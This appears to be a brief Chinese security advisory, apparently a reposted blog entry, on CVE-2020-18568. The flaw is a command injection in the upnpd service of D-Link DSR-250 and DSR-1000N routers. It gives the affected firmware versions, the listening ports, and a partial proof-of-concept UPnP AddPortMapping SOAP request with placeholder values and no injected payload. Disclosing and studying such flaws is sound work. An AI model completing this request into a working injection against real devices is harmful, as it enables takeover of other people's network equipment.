# D-Link DSR-250 DSR-1000N 命令注入(CVE-2020-18568)
影响版本:DSR-250(3.14)DSR-1000N(2.11B201)
固件包中有一个upnpd程序,该程序在0.0.0.0上侦听端口1900(udp)和49152(tcp)。通过逆向分析,当程序设置iptable时,未检查参数,这可能导致命令注入。
**PoC:**
“`xml
POST /upnp/control/WANIPConn1 HTTP/1.1
HOST: $control_host:$control_port
Content-Length: $content_length
Content-Type: text/xml; charset=”utf-8″
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
“`
ref:
* https://nvd.nist.gov/vuln/detail/CVE-2020-18568
* https://gist.github.com/WinMin/5b2bc43b517503472bb28a298981ed5a
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容